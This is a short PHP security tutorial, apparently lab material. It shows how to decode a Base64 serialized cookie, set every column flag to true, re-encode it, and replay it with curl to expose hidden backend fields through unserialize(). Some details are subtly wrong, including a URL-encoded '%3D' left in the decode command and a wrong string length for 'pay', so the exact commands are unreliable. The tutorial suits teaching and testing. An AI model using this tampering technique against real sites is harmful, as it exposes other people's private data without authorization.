# PHP Security

**Decode the cookie for unserialize() flaw**

View the cookies from the sample web application using your browser’s built-in "developer tools". For instance, opening up your developer console, you can enter `document.cookie`.

We are interested in the value set for the applicable cookie, which determines which fields to display.

Our "columns" cookie has the following encoded value:

```
YTo1OntzOjQ6Im5hbWUiO2I6MTtzOjU6ImVtYWlsIjtiOjA7czo1OiJwaG9uZSI7YjowO3M6ODoic3VtbWFyeSI7YjoxO3M6NjoicGF5IjtiOjA7fTc%3D
```

we see a string ending with `%3D` or `=` there is a high chance it is encoded in Base64.

To decode this string, enter the following in your Terminal:

```
echo "YTo1OntzOjQ6Im5hbWUiO2I6MTtzOjU6ImVtYWlsIjtiOjA7czo1OiJwaG9uZSI7YjowO3M6ODoic3VtbWFyeSI7YjoxO3M6NjoicGF5IjtiOjA7fTc%3D" | base64 -d
```

Decoded, we can see that this is [serialized](https://en.wikipedia.org/wiki/Serialization) data. It says: an array of five elements, each element having as the index the column name and the value a boolean flag. We could expand this into an array that looks something like:

```
Array
(
    [name] => 1
    [email] => 0
    [phone] => 0
    [summary] => 1
    [pay] => 0
)
```

The boolean 1 or 0 values determine which fields are shown to the user. Optionally see [this article](https://en.wikipedia.org/wiki/PHP_serialization_format) for more details on this serialized data structure.

We can modify the serialized string to show *all* the columns by changing the `b:0` entries to `b:1`, re-encoding it in Base64, and replacing the value of the cookie. For instance, the following line at the Terminal will display a Base64-encoded string representing our serialized data where all the array values are "on":

```
echo -n 'a:5:{s:4:"name";b:1;s:5:"email";b:1;s:5:"phone";b:1;s:8:"summary";b:1;s:6:"pay";b:1;}' | base64 -w0
```

We're now going to tamper with the existing cookie to use this value instead. This can be done using a browser extensions and dedicated tools like BurpSuite, CyberChef, [Postman](https://learning.postman.com/docs/sending-requests/cookies/), or even a web proxy. In this case, we can also just use [curl](https://everything.curl.dev/http/cookies) at the Terminal by passing the `-b` option:

```
curl -H 'Origin: https://example.site' -X POST https://example.site -b "columns=YOUR_COOKIE_VALUE"
```

Replace "YOUR\_COOKIE\_VALUE" with your modified Base64-encoded string, through to the ending `=` sign, as created in the command above.

This can be used to prove that, on the server side, an `unserialize()` function call was made to fetch the sensitive backend data.